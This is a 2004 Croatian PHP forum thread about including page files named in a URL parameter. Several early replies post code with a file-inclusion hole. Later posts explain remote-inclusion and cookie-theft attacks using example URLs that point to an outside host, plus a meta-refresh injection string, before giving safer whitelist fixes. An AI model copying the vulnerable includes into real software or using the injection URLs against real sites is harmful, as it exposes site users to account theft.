Forum FAQForum FAQSearchSearch MemberlistMemberlist Forum ignore listForum ignore list RegisterRegister ProfileProfile Log in to check your private messagesLog in to check your private messages Log inLog in
Pomoć oko includea...

 
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    mi3dot.org Forum Index -> Server-side
View previous topic :: View next topic  
Author Message
unLog!c



Joined: 27 May 2004
Posts: 185
Location: Osijek

PostPosted: 27.06.2004 22:36    Post subject: Pomoć oko includea... Add user to your forum ignore list Reply with quote

Vi koji kontate php pomozite, ja sam sebi napravio u indexu jedan include koji izgleda vak:
<?php include('$inc.php') ?>
a link izgleda ovako index.php?inc=nešto

e sada, ja imam pokraj stranicu nešto.php, i ja predpostavljam da bi on meni trebao kada ja kliknem na taj link includati tamo gdje sam stavio, ali to mi ne funkcionira, zašto, šta sam pogrješio, de mi molm vas pomozite..

_________________
Why dont you go out and play hide and go fuck your self like all other NORMAL kids?
Back to top
View user's profile Send private message MSN Messenger
_butch



Joined: 10 Sep 2003
Posts: 870
Location: Maichno, Krlovc

PostPosted: 27.06.2004 22:42    Post subject: Add user to your forum ignore list Reply with quote

probaj 'vako
ako ima index.php?inc=nesto
Code:

<?php
$include_file = $_GET['inc'];
include ($include_file.'.php');
?>


edit: damn.. nisam ja kriv.. nesto drugo je krivo Wink

Last edited by _butch on 27.06.2004 23:12; edited 1 time in total

_________________
FRENCH GUARD: No chance, English bed-wetting types.
I burst my pimples at you and call your door-opening request a silly thing, you tiny-brained wipers of other people's bottoms!
Flikrac
Back to top
View user's profile Send private message Visit poster's website MSN Messenger
che.UP
mi3.crew


Joined: 07 Sep 2003
Posts: 2320
Location: zagreb

PostPosted: 27.06.2004 22:47    Post subject: Add user to your forum ignore list Reply with quote

daj buć imas tipfeler :)

_________________
UP | TypeTester | Accommodations App
Meni u Firefox-u ne radi AJAX
Back to top
View user's profile Send private message Visit poster's website
ahri



Joined: 04 Nov 2003
Posts: 27
Location: Zagreb

PostPosted: 27.06.2004 22:49    Post subject: Add user to your forum ignore list Reply with quote

<?php include($inc.".php") ?>

_________________
leave this area blank.
Back to top
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
silence



Joined: 24 Apr 2004
Posts: 890
Location: .....ni na nebu, ni na zemlji.....

PostPosted: 28.06.2004 08:21    Post subject: Add user to your forum ignore list Reply with quote

include ( $_GET['inc'].".php" );

_________________
This End-User License is an agreement between Microsoft Corporation (hereafter referred to as "Microsoft") and you, the end-user (hereafter referred to as "our bitch").
Back to top
View user's profile Send private message Visit poster's website
maxy



Joined: 07 Sep 2003
Posts: 894
Location: Zagreb

PostPosted: 28.06.2004 08:45    Post subject: Add user to your forum ignore list Reply with quote

jao, ne, isuse, uzas - NE TO NIKAD RADIT, NIKAD NIKAD NIKAD!!!!!

ovo je jedan od primjera LOSEG kodiranja - makar si pocetnik ja te moram upozorit da si si ostavio takav potencijal za pizdariju da je to nevjerovatno Smile

po meni bi bilo bolje da se odlucis za listu fajlova koje zelis inkludat. recimo, imas 5 mogucih slucajeva.
1.) inkludas nesto_1.php
2) nesto_2.php
.
.
5.) nesto_5.php

onda napravis


Code:
switch($_GET['inc'])
{
case nesto_1:
include_once ('nesto_1.php');
break;

case nesto_2:
include_once('nesto_2.php');
break;
..
..
..
}


tako imas kontrolu nad svime sto se moze inkludat jer na ovaj tvoj nacin ti netko moze inkludat php fajl koji je nekakav javascript i ako koristis login system moze ti procitati sve cookie sa login informacijama o korisniku i pokrasti ti akaunte i stvorit generalnu pizdariju na sajtu pa ces imat glavobolju samo zato jer si htio sto brze (i losije) rijesiti trivijalan problem.
Back to top
View user's profile Send private message
silence



Joined: 24 Apr 2004
Posts: 890
Location: .....ni na nebu, ni na zemlji.....

PostPosted: 28.06.2004 09:32    Post subject: Add user to your forum ignore list Reply with quote

e maxy, ak ti nije bed...ajd objasni zakaj se to može dogodit....

kako može includat JS preko toga?
drugo da je išo sa www.nesto.com?inc=datoteka.php
pa include ( $_GET['inc'] );


još ako stavi svi includove recimo u folder "neki_folder"
i stavi ->
include ( "neki_folder".$_GET['inc'].".php" );
kak onda možeš izvršit JS tamo???
ajd pliz objasni, ja sam isto znao prije napravit ovako (sad ipak posložim drugačije, ali me zanima).

_________________
This End-User License is an agreement between Microsoft Corporation (hereafter referred to as "Microsoft") and you, the end-user (hereafter referred to as "our bitch").
Back to top
View user's profile Send private message Visit poster's website
maxy



Joined: 07 Sep 2003
Posts: 894
Location: Zagreb

PostPosted: 28.06.2004 10:10    Post subject: Add user to your forum ignore list Reply with quote

pa ljepo, opce nije bitno sto je ekstenzija .php.
evo primjer:

www.tvojsajt.com/index.php?inc=nesto
dakle inkludas nesto.php

sad ja napisem:

www.tvojsajt.com/index.php?inc=http://www.moj_sajt.com/cookiejar

sto tvoja skripta ucini

uzme http://www.moj_sajt.com/cookiejar i to prevori u http://www.moj_sajt.com/cookiejar.php

oke, ja sad taj file cookiejar.php kreiram na svom serveru i preko javaskripte pocnem citati cookie.
(opce nije bitno sto inkludani fajl mora biti php jer kad inkludas php fajl sa drugog servera onda sve sto dobijes je HTML kojeg taj php fajl izbaci a js i html su lako spojivi).

u cemu je cjela poanta - recimo da sam dosao na ovaj forum i sada ja posaljem nekakav link ali tipa klikni[url= www.tvojsajt.com/index.php?inc=http://www.moj_sajt.com/cookiejar]ovdje[url] i ti kliknes na to.

moja javaskripta koja je maskirana kao php se uspjesno includa u sajt i sada smije procitati tvoj cookie sa tvojim podacima jer cookie smiju citati samo sajtovi koji su ih postavili. posto je moja skripta kod tebe - svi uvjeti su ispunjeni i imas jedan ozbiljni security problem jer osim sto je ovo teoretski problem - to se znalo dogadjati na puno sajtova stoga ja preporucam da ako vec radite sistem da se inkluda file naveden u GET varijabli onda napravite dodatne provjere kako ne bi bilo zajeba poput gore navedenog.

nasao sam na sitepointu clanak koji se bavi upravo ovim problemom sa includanjem pa ako ga pronadjem onda cu poslati link ovdje da procitate.
Back to top
View user's profile Send private message
silence



Joined: 24 Apr 2004
Posts: 890
Location: .....ni na nebu, ni na zemlji.....

PostPosted: 28.06.2004 10:19    Post subject: Add user to your forum ignore list Reply with quote

ok.
samo jedno pitanje, ako sve što želim includat strpam u jedan folder, recimo "datoteke" na siteu koji radim, onda ovo baš i neće radit?
include ( "datoteke/".$_GET['inc'].".php" );


jer bi po tome bilo :: "datoteke/http://www.mojsajt.com/neka_skripta.php"
ili postoji i način da se i to zaobiđe?

_________________
This End-User License is an agreement between Microsoft Corporation (hereafter referred to as "Microsoft") and you, the end-user (hereafter referred to as "our bitch").
Back to top
View user's profile Send private message Visit poster's website
maxy



Joined: 07 Sep 2003
Posts: 894
Location: Zagreb

PostPosted: 28.06.2004 10:28    Post subject: Add user to your forum ignore list Reply with quote

onda upisivanje URL-a nece raditi jer si napravio nesto da zastitis sajt Smile
ne znam dal postoji fora da se to zaobidje jer ja nikad nisam pokusao napravit takvu stvar vec sam ih probavao izbjeci.
Back to top
View user's profile Send private message
zytzagoo
mi3.crew


Joined: 25 Aug 2003
Posts: 1842
Location: Zagreb, Hrvatska

PostPosted: 28.06.2004 10:28    Post subject: Add user to your forum ignore list Reply with quote

maxy wrote:
(opce nije bitno sto inkludani fajl mora biti php jer kad inkludas php fajl sa drugog servera onda sve sto dobijes je HTML kojeg taj php fajl izbaci a js i html su lako spojivi).

Samo remark, ako www.moj_sajt.com nije konfiguriran da parsa php (a serveri koji sluze za cross-site scripting napade redovno nisu, i to namjerno), ispljunut ce van sirovi php file, a ne html, pa na taj nacin pokrecem svoj php file na tvom serveru, a onda tek mogu raditi sto hocu Smile

_________________
[+]I[+]am[+]my[+]own[+]religion[+]
Back to top
View user's profile Send private message Visit poster's website Twitter profile
maxy



Joined: 07 Sep 2003
Posts: 894
Location: Zagreb

PostPosted: 28.06.2004 10:42    Post subject: Add user to your forum ignore list Reply with quote

silence wrote:
ok.
samo jedno pitanje, ako sve što želim includat strpam u jedan folder, recimo "datoteke" na siteu koji radim, onda ovo baš i neće radit?
include ( "datoteke/".$_GET['inc'].".php" );


jer bi po tome bilo :: "datoteke/http://www.mojsajt.com/neka_skripta.php"
ili postoji i način da se i to zaobiđe?



evo, otkrio sam sljedecu foru Smile

<meta http-equiv=refresh content=0;url=http://www.mi3dot.org>

ovo cemo upisati u URL a pazi moj file:

<?php

include('datoteke/'.$_GET['inc'].'.php');

?>

u URL sam upisao: localhost/a.php?inc=<meta http-equiv=refresh content=0;url=http://www.mi3dot.org>

probaj i sam pa pogledaj sto se dogodi Smile

dakle, sad mogu JS direktno u URL upisat i napravit ti sto zelim Smile
Back to top
View user's profile Send private message
silence



Joined: 24 Apr 2004
Posts: 890
Location: .....ni na nebu, ni na zemlji.....

PostPosted: 28.06.2004 10:47    Post subject: Add user to your forum ignore list Reply with quote

heh. sva sreća je da sam prestao to koristiti...
naime imao sam istu glupost na staroj verziji mog weba (moj prvi php koji je radio), pa me nazvao admin iz Iskona i reko da to mjenjamo...hehe...

sad mi je ionako sve drugačije posloženo, ali baš me zanimalo kaj se može napravit.
thx Very Happy

_________________
This End-User License is an agreement between Microsoft Corporation (hereafter referred to as "Microsoft") and you, the end-user (hereafter referred to as "our bitch").
Back to top
View user's profile Send private message Visit poster's website
maxy



Joined: 07 Sep 2003
Posts: 894
Location: Zagreb

PostPosted: 28.06.2004 10:55    Post subject: Add user to your forum ignore list Reply with quote

obicno se tako lose isprogramirani sajtovi koriste za spamanje mailom ili za dobivanje informacija o serveru kako bi ga se moglo haknut..
eto, hoces si skratit trud a ono te neki haker zajebe da nemos vjerovat.. zato treba znat kak stvari rade Smile
Back to top
View user's profile Send private message
silence



Joined: 24 Apr 2004
Posts: 890
Location: .....ni na nebu, ni na zemlji.....

PostPosted: 28.06.2004 11:12    Post subject: Add user to your forum ignore list Reply with quote

a čuj, kad se sam primiš učenja PHPa, onda obično neke stvari ni ne pokupiš, nego dođu kasnije .....

_________________
This End-User License is an agreement between Microsoft Corporation (hereafter referred to as "Microsoft") and you, the end-user (hereafter referred to as "our bitch").
Back to top
View user's profile Send private message Visit poster's website
maxy



Joined: 07 Sep 2003
Posts: 894
Location: Zagreb

PostPosted: 28.06.2004 11:17    Post subject: Add user to your forum ignore list Reply with quote

silence wrote:
a čuj, kad se sam primiš učenja PHPa, onda obično neke stvari ni ne pokupiš, nego dođu kasnije .....


istina. zato uvijek treba citati forume, tutoriale itd jer nikad ne znas koju korisnu stvarcicu mozes saznati.

preporucam www.devshed.com i www.sitepoint.com
Back to top
View user's profile Send private message
_butch



Joined: 10 Sep 2003
Posts: 870
Location: Maichno, Krlovc

PostPosted: 28.06.2004 12:34    Post subject: Add user to your forum ignore list Reply with quote

evo bas članka o security pogreškama

_________________
FRENCH GUARD: No chance, English bed-wetting types.
I burst my pimples at you and call your door-opening request a silly thing, you tiny-brained wipers of other people's bottoms!
Flikrac
Back to top
View user's profile Send private message Visit poster's website MSN Messenger
t3r0



Joined: 08 Jun 2004
Posts: 107

PostPosted: 28.06.2004 23:50    Post subject: Add user to your forum ignore list Reply with quote

Ovo bi trebalo rijesiti sve (ili barem vecinu) problema kod ovog nacina inkludanja:

Code:
error_reporting(0);


Code:
$inc_file = dirname(__FILE__)."/".basename($_GET['inc']).".php";

if (file_exists($inc_file))  { include($inc_file); }
else { echo "ERROR 404 :)"; }


error_reporting(0); stavi kad planiras "objaviti" sajt, jer to bas i nema smisla dok ga pravis, inace error_reporting(E_ALL); zbog debuginga.
file_exists provjerava da li postoji fajl na serveru.
A moglo bi i bez ovoga dirname(__FILE__), al se osjecam sigurniji kad je to tu Smile
Mozda bi bilo bolje staviti require umjesto include... ali bi onda izbacivalo fatal error umjesto warninga Smile
btw, ovo sam napisao napamet, tako da nije provjereno, ali onako odokativno mi se cini da je ovo ok "zastita".
maxy molim te proanaliziraj mozda sam u zabludi Rolling Eyes
Back to top
View user's profile Send private message
Display posts from previous:   
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    mi3dot.org Forum Index -> Server-side All times are GMT + 1 Hour
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB © 2001, 2005 phpBB Group